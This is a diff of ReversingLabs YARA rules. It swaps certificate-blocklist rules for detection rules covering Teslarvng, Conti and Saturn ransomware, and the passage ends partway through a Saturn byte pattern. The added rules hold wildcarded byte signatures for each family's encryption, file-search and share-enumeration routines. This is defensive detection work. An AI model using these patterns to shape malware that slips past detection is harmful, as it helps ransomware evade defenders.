+rule REVERSINGLABS_Win32_Ransomware_Teslarvng : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Teslarvng ransomware."
 		author = "ReversingLabs"
-		id = "22104929-e2c5-565c-975c-826f666e78e2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7045b13e-95a5-54da-b540-75d464e7673d"
+		date = "2020-12-14"
+		modified = "2020-12-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4252-L4268"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e1593a2bf375912e411d5f19d9e232c6b87f0897bb6f1c0b0539380b34b05af5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Teslarvng.yara#L1-L137"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "670621aa196a80fbb694e4b1690d7da60e881c5b826133939e61cd6c2406ea98"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Teslarvng"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A8 ?? 00 00 A1 ?? ?? ?? ?? ?? ?? ?? ?? EC 56 57 50
+            8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? C9 89 4D ?? 89 4D ?? 8B 73 ?? 8B 43 ?? 89 75
+            ?? 89 45 ?? 3B F0 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 8D 04 40 C1 E0 ?? 89 45
+            ?? 8B 04 02 8B 40 ?? 8B 30 3B F0 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 10 89 ?? ?? ?? ?? E3 ?? 00 0F 43 05 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? 33 C0
+            83 C9 ?? 66 89 45 ?? 89 4D ?? 8D 4D ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B
+            C7 72 ?? 8B 07 FF 77 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 0F 10 00 0F 11 85
+            ?? ?? ?? ?? F3 0F 7E 40 ?? 83 4D ?? ?? 66 0F D6 45 ?? 66 89 08 8D 8D ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 74 ?? 6A ?? 8D 4D ?? 51
+        }
+		$encrypt_files_p2 = {
+            FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
+            8B 41 ?? 89 45 ?? 83 78 ?? ?? 8B 48 ?? 89 4D ?? 72 ?? 8B 00 89 45 ?? C6 45 ?? ?? 33
+            C0 83 4D ?? ?? 8D 4D ?? 66 89 45 ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B 47
+            ?? 72 ?? 8B 3F 50 57 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 6A ?? 8D 45
+            ?? 50 FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 8B 36 8B 4D ?? 8B 04 02 3B 70 ?? 0F 85 ?? ??
+            ?? ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 3B 75 ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
+            4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D 8B E3 5B C2
+        }
+		$find_files = {
+            FF D6 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 78 ?? ?? 72 ?? 8B 00 B2 ?? 8B C8 E8 ?? ?? ?? ?? C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? 33 C9 8B 85 ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 83 D0 ?? 50 51 FF B5 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B C8 90 66 8B 31 66 3B 32 75 ?? 66 85 F6
+            74 ?? 66 8B 71 ?? 66 3B 72 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 F6 75 ?? 33 C9 EB ?? 1B
+            C9 83 C9 ?? 85 C9 74 ?? B9 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B
+            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ??
+            85 C0 74 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45
+            ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? FF D6 83 F8 ?? 0F
+            84 ?? ?? ?? ?? FF D6 8B D0
+        }
+		$enum_shares_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D
+            75 ?? 83 7D ?? ?? 6A ?? 0F 43 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 B8 ?? ?? ??
+            ?? 56 66 89 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 66 89
+            45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D
+            45 ?? 50 57 FF 15 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 89 7D ?? 50
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 6A ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ??
+            83 7D ?? ?? 0F 86 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 75 ?? 0F
+            43 4D ?? 03 F1 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 0F 43
+            4D ?? 33 C0 66 89 45 ?? 8B C6 2B C1 89 4D ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8D 4D ?? 56 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ??
+            ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 66
+        }
+		$enum_shares_p2 = {
+            0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 33 F6 8B 55 ?? 85 D2 0F 84 ?? ?? ?? ?? 33 FF 8B 4D ?? 8B 44 39 ?? 85 C0 74 ?? 3D
+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 14 39 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 48 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 66
+            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B 45 ?? 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 45 ?? 3B 45 ?? 74 ?? 0F 10 45 ?? C7 40 ?? ?? ?? ?? ?? 0F 11 00 F3 0F 7E 45 ??
+            66 0F D6 40 ?? 33 C0 83 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45
+            ?? EB ?? 8D 4D ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8B 55 ?? 46 83 C7 ?? 3B F2 0F 82 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 3B 45 ?? 0F 84 ?? ??
+            ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 83 7D ?? ??
+            8B 7D ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 89 45 ?? 83 FF ?? 73 ?? 0F 10 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11
+            85 ?? ?? ?? ?? EB ?? 8B F7 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 CE ?? 3B F0 0F 47 F0
+        }
+		$enum_shares_p3 = {
+            8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 0C 7D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 FF 75 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 8B 7D
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ??
+            3B F8 0F 84 ?? ?? ?? ?? 2B C7 C1 F8 ?? 69 F0 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 8D 0C 76 89 45 ?? 8D 04 C8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ??
+            0F 57 C0 8B B5 ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 75 ?? 89
+            45 ?? C6 45 ?? ?? 66 90 57 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 83 C7 ?? 89 75 ?? 3B 7D ??
+            75 ?? 89 75 ?? C6 45 ?? ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D
+            85 ?? ?? ?? ?? 8B 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? FF 76 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ??
+            8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 06 F0 FF 08 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? EB ?? 57 FF 15 ?? ?? ?? ?? 8B 75
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "05:22:42:ac:e5:83:ad:f2:a3:b9:6a:dc:b0:4d:08:12" and 1573603200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Bebef5C533Ce92Efc402Fab8605C43Ec : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Conti : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Conti ransomware."
 		author = "ReversingLabs"
-		id = "59d3dd01-47bc-59ee-8fe7-fd5b1af8f9f4"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "548b8836-83cb-560c-af5f-33bdb24d15ed"
+		date = "2020-12-14"
+		modified = "2020-12-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4270-L4288"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "daa57ad622799467c60693060e6c9eea18bdf0bb26f178e8b03453aab486ccf4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Conti.yara#L1-L74"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4f2b96c8eaf8d112a7bb60647db49616935a336396c705d39d5bb51dfd90c60b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Conti"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B D9 53 FF 15 ?? ?? ?? ?? 89 44 24 ??
+            8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 44
+            24 ?? B9 ?? ?? ?? ?? 53 BE ?? ?? ?? ?? 57 66 83 7C 43 ?? ?? 0F 45 F1 FF 15 ?? ?? ??
+            ?? 56 57 FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ??
+            8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B
+            CB E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B CE E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B CB E8 ?? ?? ?? ?? 8B F0 85 F6
+            74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 5A 8B C8 C6 01 ?? 41
+            83 EA ?? 75 ?? 83 48 ?? ?? 50 89 70 ?? A1 ?? ?? ?? ?? 52 6A ?? FF 70 ?? FF 15 ?? ??
+            ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? E8 ??
+            ?? ?? ?? 83 FF ?? 74 ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BB ?? ?? ?? ?? 8B F9 53 57 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 75 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? FF 74 B5 ?? 57 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 46 83 FE ?? 7C ?? 33 C0 40 EB ?? 85 C0 75 ?? 8B 35 ?? ?? ?? ?? BB ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 53 56 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 2B C6 D1 F8 74 ?? 85 C0 78 ?? 40 50 56 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 56 FF 15 ??
+            ?? ?? ?? 8B F0 85 F6 74 ?? 83 C6 ?? EB ?? 33 C0 5F 5E 5B C9 C3
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 83 EC ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB 53 FF 15 ?? ??
+            ?? ?? 8B F8 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 5E 56 68 ?? ?? ??
+            ?? 53 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53
+            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 53 53 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 4D ??
+            8B D7 FF 75 ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ??
+            8B 45 ?? B9 ?? ?? ?? ?? 83 48 ?? ?? 8B 45 ?? 8B 58 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74
+            ?? 53 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ??
+            ?? 8B CE E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 49 ?? E8 ?? ?? ?? ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO VEKTOR" and ( pe.signatures [ i ] . serial == "00:be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" or pe.signatures [ i ] . serial == "be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" ) and 1587513600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1D3F39F481Fe067F8A9289Bb49E05A04 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Saturn : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Saturn ransomware."
 		author = "ReversingLabs"
-		id = "0c4b6efb-c793-5505-bcd6-f62266c984c6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "70a8d937-aee5-54d8-9409-c5d2d0830a2b"
+		date = "2020-10-19"
+		modified = "2020-10-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4290-L4306"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2fdf8b59d302d2ce81a1e9a5715138adc1ec45bd86871c4c2e46412407e329f9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Saturn.yara#L1-L105"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "efa748346ad8c46e654542d302e81d633a2d12f421636c477431a12a34636132"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Saturn"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_1 = {
+            6A ?? C6 45 ?? ?? 8D 4D ?? 8B 3B 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 3B C8 74 ??
+            83 78 ?? ?? 8B C8 72 ?? 8B 08 FF 70 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A
+        }
+		$find_files_2_p1 = {
+            68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? FF 75
+            ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D
+            4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ??
+            0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ??
+            ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50
+            8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
